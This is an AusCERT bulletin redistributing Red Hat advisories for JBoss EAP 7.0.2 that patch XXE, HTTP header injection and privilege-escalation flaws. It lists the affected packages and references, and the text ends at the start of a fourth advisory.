Operating System:

[RedHat]

Published:

09 September 2016

Protect yourself against future threats.

//Service

Incident Management

Whether it is proactive or reactive services you're after, we will help you detect, interpret and respond to attacks from across the globe.

Read more
Resources > Security Bulletins > ESB-2016.2112 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2016.2112
     Important: JBoss Enterprise Application Platform on RHEL 6 and 7
                             9 September 2016

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           JBoss Enterprise Application Platform
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 6
                   Red Hat Enterprise Linux Server 7
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
                   Increased Privileges            -- Existing Account            
                   Provide Misleading Information  -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2016-5406 CVE-2016-4993 CVE-2015-0254

Reference:         ESB-2016.1640
                   ESB-2016.0298
                   ESB-2015.2277

Original Bulletin: 
   https://rhn.redhat.com/errata/RHSA-2016-1838.html
   https://rhn.redhat.com/errata/RHSA-2016-1839.html
   https://rhn.redhat.com/errata/RHSA-2016-1840.html
   https://rhn.redhat.com/errata/RHSA-2016-1841.html

Comment: This bulletin contains four (4) Red Hat security advisories.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2 on RHEL 6
Advisory ID:       RHSA-2016:1838-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1838.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available for
Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server - noarch

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to utilize external entity
references, which could access resources on the host system and,
potentially, allowing arbitrary code execution. (CVE-2015-0254)

* It was reported that EAP 7 Application Server/Undertow web server is
vulnerable to the injection of arbitrary HTTP headers, and also response
splitting, due to insufficient sanitization and validation of user input
before the input is used as part of an HTTP header value. (CVE-2016-4993)

* The domain controller will not propagate its administrative RBAC
configuration to some slaves. An attacker could use this to escalate their
privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4731 - Tracker bug for the EAP 7.0.2 release for RHEL-6

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server:

Source:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el6.src.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el6.src.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el6.src.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el6.src.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el6.src.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.src.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el6.src.rpm

noarch:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-cli-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-commons-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-core-client-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-dto-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-hornetq-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-hqclient-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-jms-client-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-jms-server-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-journal-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-native-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-ra-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-selector-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-server-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-service-extensions-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-rt-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-services-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-tools-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jberet-core-1.2.1-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-api-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-common-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-config-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-api-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-impl-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-simple-schema-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-impl-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-wildfly8-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-async-http-servlet-3.0-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-atom-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-cdi-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-client-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-crypto-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jackson-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jackson2-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jaxb-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jaxrs-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jettison-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jose-jwt-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jsapi-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-json-p-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-multipart-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-spring-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-validator-provider-11-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-yaml-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-modules-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-bindings-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-policy-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-common-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-dom-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-policy-stax-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-stax-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.noarch.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el6.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/?version=7.0/

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bDqXlSAg2UNWIIRAnwgAKCMklErMwXg/gMEc52/KVQF5UmyvQCfY71E
CrpqL0JbtmtT9732KVw3ccg=
=IkPn
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2 for RHEL 7
Advisory ID:       RHSA-2016:1839-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1839.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available for
Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server - noarch

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to utilize external entity
references, which could access resources on the host system and,
potentially, allowing arbitrary code execution. (CVE-2015-0254)

* It was reported that EAP 7 Application Server/Undertow web server is
vulnerable to the injection of arbitrary HTTP headers, and also response
splitting, due to insufficient sanitization and validation of user input
before the input is used as part of an HTTP header value. (CVE-2016-4993)

* The domain controller will not propagate its administrative RBAC
configuration to some slaves. An attacker could use this to escalate their
privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4732 - Tracker bug for the EAP 7.0.2 release for RHEL-7

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server:

Source:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el7.src.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el7.src.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-common-3.1.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-picketbox-4.9.7-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el7.src.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el7.src.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el7.src.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el7.src.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el7.src.rpm

noarch:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-cli-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-commons-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-core-client-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-dto-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-hornetq-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-hqclient-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-jms-client-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-jms-server-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-journal-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-native-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-ra-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-selector-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-server-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-service-extensions-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-rt-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-services-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-tools-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jberet-core-1.2.1-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-common-3.1.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketbox-4.9.7-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketbox-infinispan-4.9.7-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-api-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-common-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-config-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-api-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-impl-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-simple-schema-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-impl-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-wildfly8-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-async-http-servlet-3.0-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-atom-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-cdi-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-client-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-crypto-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jackson-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jackson2-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jaxb-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jaxrs-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jettison-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jose-jwt-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jsapi-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-json-p-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-multipart-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-spring-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-validator-provider-11-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-yaml-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-modules-7.0.2-2.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-bindings-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-policy-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-common-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-dom-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-policy-stax-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-stax-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el7.noarch.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/?version=7.0

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bD7XlSAg2UNWIIRApIiAJ9VMQ7SJqr5M74cnRmrgATj0ftMRwCeMDXz
8sMeQvqNC9hnIFkriU/AN5A=
=g7wS
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: eap7-jboss-ec2-eap security, bug fix, and enhancement update
Advisory ID:       RHSA-2016:1840-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1840.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss
Enterprise Application Platform 7.0 for RHEL 6 and Red Hat JBoss Enterprise
Application Platform 7.0 for RHEL 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server - noarch
Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server - noarch

3. Description:

The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss
Enterprise Application Platform running on the Amazon Web Services (AWS)
Elastic Compute Cloud (EC2).

With this update, the eap7-jboss-ec2-eap package has been updated to ensure
compatibility with Red Hat JBoss Enterprise Application Platform 7.0.2.
Refer to the JBoss Enterprise Application Platform 7.0.2 Release Notes,
linked to in the References section, for information about the most
significant bug fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to utilize external entity
references, which could access resources on the host system and,
potentially, allowing arbitrary code execution. (CVE-2015-0254)

* It was reported that EAP 7 Application Server/Undertow web server is
vulnerable to the injection of arbitrary HTTP headers, and also response
splitting, due to insufficient sanitization and validation of user input
before the input is used as part of an HTTP header value. (CVE-2016-4993)

* The domain controller will not propagate its administrative RBAC
configuration to some slaves. An attacker could use this to escalate their
privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4734 - jboss-ec2-eap for EAP 7.0.2

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server:

Source:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.src.rpm

noarch:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.noarch.rpm
eap7-jboss-ec2-eap-samples-7.0.2-2.GA_redhat_1.ep7.el6.noarch.rpm

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server:

Source:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el7.src.rpm

noarch:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el7.noarch.rpm
eap7-jboss-ec2-eap-samples-7.0.2-2.GA_redhat_1.ep7.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bEDXlSAg2UNWIIRAhzHAJ0aRfYhnQ17z3CPfYgwOn9uGyEEoQCbBefA
c5ScVpEfHhWkIZ3El0uuI94=
=mT22
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

